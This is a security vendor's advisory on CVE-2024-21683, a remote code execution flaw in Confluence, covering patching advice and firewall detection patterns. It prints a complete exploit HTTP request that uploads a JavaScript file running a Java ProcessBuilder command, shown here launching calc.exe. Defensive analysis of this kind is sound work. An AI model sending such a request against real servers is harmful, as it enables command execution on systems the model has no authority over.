Vulnerability report written by the TA team by analyzing "Atlassian Confluence Remote Code Execution (CVE-2024-21683)"
Atlassian Confluence Remote Code Execution
The vulnerability is an RCE vulnerability in Confluence Data Center and Server that allows users with "Confusion Administrator" privileges to upload malicious JS files through the "Add New Language" feature in General Configuration - Configuration Code Macro settings to execute malicious commands.
This vulnerability can be resolved by applying the security update announced by Atlasian in March 2024, and in our AIWAF product, it is normally detected through related patterns.
1. Overview
Confluence, a solution provided by Atlassian that provides options for collaboration across teams, has been analyzed for CVE-2024-21683, a remote code execution vulnerability in the solution.
Source : https://www.helpnetsecurity.com/2024/06/03/cve-2024-21683-poc/
2. Attack types
The vulnerability is an RCE vulnerability in Confluence Data Center and Server that gained a lot of attention when exploit information for the vulnerability was published on Github.
The vulnerability allows users to upload arbitrary files by selecting the “Add new language” feature in the General Configuration - Configure Code Macro settings, which tricks users into uploading and executing a maliciously crafted JS file.
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 512
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/admin/plugins/newcode/save.action
Accept-Encoding: gzip, deflate, br
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: [Your cookies ]
Connection: close
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="atl_token"
[ atl_token ]
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="newLanguageName"
RCE
------WebKitFormBoundaryvguW5DY0BuQ87x08--
However, the vulnerability is relatively difficult to exploit due to the fact that the settings can only be accessed through a user account with “Confluence Administrator” privileges, which requires a highly privileged account, but if you can get that account, it's very easy to execute the malware.
3. What to do
Atlassian has released a patch for this vulnerability in the March 2024 security update, so you can update Confluence to the latest version to protect against this vulnerability.
Our AIWAF product uses the 851: Apache HTTP Server to detect syntax such as java.lang. syntax in the 851: Apache Struts Framework Vulnerability pattern or the 724: Upload File Vulnerability (Script) pattern to detect JS file uploads, but we are in the process of further analyzing whether additional patterns for this attack syntax are needed.
4. Conclusion
The RCE attack in Altassian Confluence is limited by the fact that it requires an account with a certain level of privileges, but if you have that account, it's a simple and easy vulnerability to exploit, and since many organizations use the solution, the impact is high enough that you should update to the latest version as soon as possible.
Our AIWAF product has developed patterns for vulnerabilities in Altassian Confluence, and we will continue to respond quickly to related vulnerabilities as they are discovered.
